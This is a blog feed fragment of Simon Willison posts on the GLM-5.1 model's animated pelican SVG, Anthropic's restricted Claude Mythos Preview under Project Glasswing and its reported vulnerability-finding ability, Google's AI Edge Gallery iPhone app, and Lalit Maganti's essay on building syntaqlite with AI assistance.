        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/meta"&gt;meta&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/facebook"&gt;facebook&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/code-interpreter"&gt;code-interpreter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="llm-reasoning"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="llms"/><category term="meta"/><category term="llm-release"/><category term="generative-ai"/><category term="facebook"/><category term="code-interpreter"/><category term="llm-tool-use"/></entry><entry><title>GLM-5.1: Towards Long-Horizon Tasks</title><link href="https://simonwillison.net/2026/Apr/7/glm-51/#atom-tag" rel="alternate"/><published>2026-04-07T21:25:14+00:00</published><updated>2026-04-07T21:25:14+00:00</updated><id>https://simonwillison.net/2026/Apr/7/glm-51/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://z.ai/blog/glm-5.1"&gt;GLM-5.1: Towards Long-Horizon Tasks&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Chinese AI lab Z.ai's latest model is a giant 754B parameter 1.51TB (on &lt;a href="https://huggingface.co/zai-org/GLM-5.1"&gt;Hugging Face&lt;/a&gt;) MIT-licensed monster - the same size as their previous GLM-5 release, and sharing the &lt;a href="https://huggingface.co/papers/2602.15763"&gt;same paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It's available &lt;a href="https://openrouter.ai/z-ai/glm-5.1"&gt;via OpenRouter&lt;/a&gt; so I asked it to draw me a pelican:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-openrouter
llm -m openrouter/z-ai/glm-5.1 'Generate an SVG of a pelican on a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And something new happened... unprompted, the model &lt;a href="https://gist.github.com/simonw/af7170f54256cc007ef28a8721564be8"&gt;decided to give me&lt;/a&gt; an HTML page that included both the SVG and a separate set of CSS animations!&lt;/p&gt;
&lt;p&gt;The SVG was excellent, and might be my new favorite from an open weights model:&lt;/p&gt;
&lt;p&gt;&lt;img alt="The bicycle is red and has a frame the correct shape and wheels with spokes. The pelican is a perky little fella." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;But the animation &lt;a href="https://gisthost.github.io/?73bb6808b18c2482f66e5f082c75f36e"&gt;broke it&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animation - the wheels and pedals rotate, the clouds move... and the pelican has vanished, but there is a little blob bobbing up and down in the top left corner." src="https://static.simonwillison.net/static/2026/glm-5.1-broken-light-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;That's the pelican, floating up in the top left corner.&lt;/p&gt;
&lt;p&gt;I usually don't do follow-up prompts for the pelican test, but in this case I made an exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -c 'the animation is a bit broken, the pelican ends up positioned off the screen at the top right'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GLM 5.1 replied:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The issue is that CSS &lt;code&gt;transform&lt;/code&gt; animations on SVG elements override the SVG &lt;code&gt;transform&lt;/code&gt; attribute used for positioning, causing the pelican to lose its placement and fly off to the top-right. The fix is to separate positioning (SVG attribute) from animation (inner group) and use &lt;code&gt;&amp;lt;animateTransform&amp;gt;&lt;/code&gt; for SVG rotations since it handles coordinate systems correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And spat out &lt;a href="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed.html"&gt;fresh HTML&lt;/a&gt; which fixed the problem!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Now everything is right - the bicycle rotates correctly, the pelican sits on it and bobs up and down, and its lower beak moves slightly as well." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed-medium-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;I particularly like the animation of the beak, which is described in the SVG comments like so:&lt;/p&gt;
&lt;div class="highlight highlight-text-xml-svg"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;&amp;lt;!--&lt;/span&gt; Pouch (lower beak) with wobble &lt;span class="pl-c"&gt;--&amp;gt;&lt;/span&gt;&lt;/span&gt;
&amp;lt;&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M42,-58 Q43,-50 48,-42 Q55,-35 62,-38 Q70,-42 75,-60 L42,-58 Z&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;url(#pouchGrad)&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#b06008&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.9&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M48,-50 Q55,-46 60,-52&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;none&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#c06a08&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.8&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.6&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;animateTransform&lt;/span&gt; &lt;span class="pl-e"&gt;attributeName&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;transform&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;type&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;scale&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;values&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1,1; 1.03,0.97; 1,1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;dur&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.75s&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;repeatCount&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;indefinite&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;additive&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;sum&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
&amp;lt;/&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: On Bluesky &lt;a href="https://bsky.app/profile/charles.capps.me/post/3miwrn42mjc2t"&gt;@charles.capps.me suggested&lt;/a&gt; a "NORTH VIRGINIA OPOSSUM ON AN E-SCOOTER" and...&lt;/p&gt;
&lt;p&gt;&lt;img alt="This is so great. It's dark, the possum is clearly a possum, it's riding an escooter, lovely animation, tail bobbing up and down, caption says NORTH VIRGINIA OPOSSUM, CRUISING THE COMMONWEALTH SINCE DUSK - only glitch is that it occasionally blinks and the eyes fall off the face" src="https://static.simonwillison.net/static/2026/glm-possum-escooter.gif.gif" /&gt;&lt;/p&gt;
&lt;p&gt;The HTML+SVG comments on that one include &lt;code&gt;/* Earring sparkle */, &amp;lt;!-- Opossum fur gradient --&amp;gt;, &amp;lt;!-- Distant treeline silhouette - Virginia pines --&amp;gt;,  &amp;lt;!-- Front paw on handlebar --&amp;gt;&lt;/code&gt; - here's &lt;a href="https://gist.github.com/simonw/1864b89f5304eba03c3ded4697e156c4"&gt;the transcript&lt;/a&gt; and the &lt;a href="https://static.simonwillison.net/static/2026/glm-possum-escooter.html"&gt;HTML result&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/glm"&gt;glm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-in-china"&gt;ai-in-china&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/svg"&gt;svg&lt;/a&gt;&lt;/p&gt;



</summary><category term="llm-release"/><category term="generative-ai"/><category term="glm"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="ai-in-china"/><category term="llms"/><category term="css"/><category term="svg"/></entry><entry><title>Anthropic's Project Glasswing - restricting Claude Mythos to security researchers - sounds necessary to me</title><link href="https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag" rel="alternate"/><published>2026-04-07T20:52:54+00:00</published><updated>2026-04-07T20:52:54+00:00</updated><id>https://simonwillison.net/2026/Apr/7/project-glasswing/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic &lt;em&gt;didn't&lt;/em&gt; release their latest model, Claude Mythos (&lt;a href="https://www-cdn.anthropic.com/53566bf5440a10affd749724787c8913a2ae0841.pdf"&gt;system card PDF&lt;/a&gt;), today. They have instead made it available to a very restricted set of preview partners under their newly announced &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The model is a general purpose model, similar to Claude Opus 4.6, but Anthropic claim that its cyber-security research abilities are strong enough that they need to give the software industry as a whole time to prepare.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mythos Preview has already found thousands of high-severity vulnerabilities, including some in &lt;em&gt;every major operating system and web browser&lt;/em&gt;. Given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely.&lt;/p&gt;
&lt;p&gt;[...]&lt;/p&gt;
&lt;p&gt;Project Glasswing partners will receive access to Claude Mythos Preview to find and fix vulnerabilities or weaknesses in their foundational systems—systems that represent a very large portion of the world’s shared cyberattack surface. We anticipate this work will focus on tasks like local vulnerability detection, black box testing of binaries, securing endpoints, and penetration testing of systems.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;There's a great deal more technical detail in &lt;a href="https://red.anthropic.com/2026/mythos-preview/"&gt; Assessing Claude Mythos Preview’s cybersecurity capabilities&lt;/a&gt; on the Anthropic Red Team blog:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;In one case, Mythos Preview wrote a web browser exploit that chained together four vulnerabilities, writing a complex &lt;a href="https://en.wikipedia.org/wiki/JIT_spraying "&gt;JIT heap spray&lt;/a&gt; that escaped both renderer and OS sandboxes. It autonomously obtained local privilege escalation exploits on Linux and other operating systems by exploiting subtle race conditions and KASLR-bypasses. And it autonomously wrote a remote code execution exploit on FreeBSD's NFS server that granted full root access to unauthenticated users by splitting a 20-gadget ROP chain over multiple packets.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Plus this comparison with Claude 4.6 Opus:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;Our internal evaluations showed that Opus 4.6 generally had a near-0% success rate at autonomous exploit development. But Mythos Preview is in a different league. For example, Opus 4.6 turned the vulnerabilities it had found in Mozilla’s Firefox 147 JavaScript engine—all patched in Firefox 148—into JavaScript shell exploits only two times out of several hundred attempts. We re-ran this experiment as a benchmark for Mythos Preview, which developed working exploits 181 times, and achieved register control on 29 more.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Saying "our model is too dangerous to release" is a great way to build buzz around a new model, but in this case I expect their caution is warranted.&lt;/p&gt;
&lt;p&gt;Just a few days (&lt;a href="https://simonwillison.net/2026/Apr/3/"&gt;last Friday&lt;/a&gt;) ago I started a new &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; tag on this blog to acknowledge an uptick in credible security professionals pulling the alarm on how good modern LLMs have got at vulnerability research.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt; of the Linux kernel:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt; of &lt;code&gt;curl&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And Thomas Ptacek published &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;, a post inspired by his &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;podcast conversation&lt;/a&gt; with Anthropic's Nicholas Carlini.&lt;/p&gt;
&lt;p&gt;Anthropic have a 5 minute &lt;a href="https://www.youtube.com/watch?v=INGOC6-LLv0"&gt;talking heads video&lt;/a&gt; describing the Glasswing project. Nicholas Carlini appears as one of those talking heads, where he said (highlights mine):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It has the ability to chain together vulnerabilities. So what this means is you find two vulnerabilities, either of which doesn't really get you very much independently. But this model is able to create exploits out of three, four, or sometimes five vulnerabilities that in sequence give you some kind of very sophisticated end outcome. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I've found more bugs in the last couple of weeks than I found in the rest of my life combined&lt;/strong&gt;. We've used the model to scan a bunch of open source code, and the thing that we went for first was operating systems, because this is the code that underlies the entire internet infrastructure. &lt;strong&gt;For OpenBSD, we found a bug that's been present for 27 years, where I can send a couple of pieces of data to any OpenBSD server and crash it&lt;/strong&gt;. On Linux, we found a number of vulnerabilities where as a user with no permissions, I can elevate myself to the administrator by just running some binary on my machine. For each of these bugs, we told the maintainers who actually run the software about them, and they went and fixed them and have deployed the patches  patches so that anyone who runs the software is no longer vulnerable to these attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I found this on the &lt;a href="https://www.openbsd.org/errata78.html"&gt;OpenBSD 7.8 errata page&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;025: RELIABILITY FIX: March 25, 2026&lt;/strong&gt;  &lt;em&gt;All architectures&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;TCP packets with invalid SACK options could crash the kernel.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ftp.openbsd.org/pub/OpenBSD/patches/7.8/common/025_sack.patch.sig"&gt;A source code patch exists which remedies this problem.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tracked that change down in the &lt;a href="https://github.com/openbsd/src"&gt;GitHub mirror&lt;/a&gt; of the OpenBSD CVS repo (apparently they still use CVS!) and found it &lt;a href="https://github.com/openbsd/src/blame/master/sys/netinet/tcp_input.c#L2461"&gt;using git blame&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/openbsd-27-years.jpg" alt="Screenshot of a Git blame view of C source code around line 2455 showing TCP SACK hole validation logic. Code includes checks using SEQ_GT, SEQ_LT macros on fields like th-&amp;gt;th_ack, tp-&amp;gt;snd_una, sack.start, sack.end, tp-&amp;gt;snd_max, and tp-&amp;gt;snd_holes. Most commits are from 25–27 years ago with messages like &amp;quot;more SACK hole validity testin...&amp;quot; and &amp;quot;knf&amp;quot;, while one recent commit from 3 weeks ago (&amp;quot;Ignore TCP SACK packets wit...&amp;quot;) is highlighted with an orange left border, adding a new guard &amp;quot;if (SEQ_LT(sack.start, tp-&amp;gt;snd_una)) continue;&amp;quot;" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Sure enough, the surrounding code is from 27 years ago.&lt;/p&gt;
&lt;p&gt;I'm not sure which Linux vulnerability Nicholas was describing, but it may have been &lt;a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=5133b61aaf437e5f25b1b396b14242a6bb0508e2"&gt;this NFS one&lt;/a&gt; recently covered &lt;a href="https://mtlynch.io/claude-code-found-linux-vulnerability/"&gt;by Michael Lynch
&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's enough smoke here that I believe there's a fire. It's not surprising to find vulnerabilities in decades-old software, especially given that they're mostly written in C, but what's new is that coding agents run by the latest frontier LLMs are proving tirelessly capable at digging up these issues.&lt;/p&gt;
&lt;p&gt;I actually thought to myself on Friday that this sounded like an industry-wide reckoning in the making, and that it might warrant a huge investment of time and money to get ahead of the inevitable barrage of vulnerabilities. Project Glasswing incorporates "$100M in usage credits ... as well as $4M in direct donations to open-source security organizations". Partners include AWS, Apple, Microsoft, Google, and the Linux Foundation. It would be great to see OpenAI involved as well - GPT-5.4 already has a strong reputation for finding security vulnerabilities and they have stronger models on the near horizon.&lt;/p&gt;
&lt;p&gt;The bad news for those of us who are &lt;em&gt;not&lt;/em&gt; trusted partners is this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We do not plan to make Claude Mythos Preview generally available, but our eventual goal is to enable our users to safely deploy Mythos-class models at scale—for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. To do so, we need to make progress in developing cybersecurity (and other) safeguards that detect and block the model’s most dangerous outputs. We plan to launch new safeguards with an upcoming Claude Opus model, allowing us to improve and refine them with a model that does not pose the same level of risk as Mythos Preview.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I can live with that. I think the security risks really are credible here, and having extra time for trusted teams to get ahead of them is a reasonable trade-off.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="anthropic"/><category term="nicholas-carlini"/><category term="ai"/><category term="llms"/><category term="ai-ethics"/><category term="thomas-ptacek"/><category term="llm-release"/><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/></entry><entry><title>Google AI Edge Gallery</title><link href="https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-tag" rel="alternate"/><published>2026-04-06T05:18:26+00:00</published><updated>2026-04-06T05:18:26+00:00</updated><id>https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337"&gt;Google AI Edge Gallery&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone.&lt;/p&gt;
&lt;p&gt;It works &lt;em&gt;really&lt;/em&gt; well. The E2B model is a 2.54GB download and is both fast and genuinely useful.&lt;/p&gt;
&lt;p&gt;The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &amp;quot;Agent Skills&amp;quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &amp;quot;Show me the Castro Theatre on a map.&amp;quot; The model response, labeled &amp;quot;Model on GPU,&amp;quot; shows it &amp;quot;Called JS skill &amp;#39;interactive-map/index.html&amp;#39;&amp;quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&amp;#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &amp;quot;Open in Maps&amp;quot; link and &amp;quot;View in full screen&amp;quot; button are shown. Below the map, the model states &amp;quot;The interactive map view for the Castro Theatre has been shown.&amp;quot; with a response time of 2.4 s. A text input field with &amp;quot;Type prompt...&amp;quot; placeholder, a &amp;quot;+&amp;quot; button, and a &amp;quot;Skills&amp;quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"&gt;&lt;/p&gt;
&lt;p&gt;(That demo did freeze the app when I tried to add a follow-up prompt though.)&lt;/p&gt;
&lt;p&gt;This is the first time I've seen a local model vendor release an official app for trying out their models on in iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47652561"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/iphone"&gt;iphone&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;



</summary><category term="gemini"/><category term="iphone"/><category term="google"/><category term="generative-ai"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="llm-tool-use"/></entry><entry><title>Eight years of wanting, three months of building with AI</title><link href="https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-tag" rel="alternate"/><published>2026-04-05T23:54:18+00:00</published><updated>2026-04-05T23:54:18+00:00</updated><id>https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages.&lt;/p&gt;
&lt;p&gt;They spent eight years thinking about and then three months building &lt;a href="https://github.com/lalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt;, which they describe as "&lt;a href="https://lalitm.com/post/syntaqlite/"&gt;high-fidelity devtools that SQLite deserves&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past myself, hence my (far less production-ready) &lt;a href="https://simonwillison.net/2026/Jan/30/sqlite-ast-2/"&gt;sqlite-ast&lt;/a&gt; project from a few months ago.&lt;/p&gt;
&lt;p&gt;Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at!&lt;/p&gt;
&lt;p&gt;Claude Code helped get over that initial hump and build the first prototype:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. AI worked great for the low level details but did not produce a coherent high-level architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time.&lt;/p&gt;
&lt;p&gt;It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles.&lt;/p&gt;
&lt;p&gt;The key idea I took away from this concerns AI's weakness in terms of design and architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all.&lt;/p&gt;
&lt;p&gt;But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


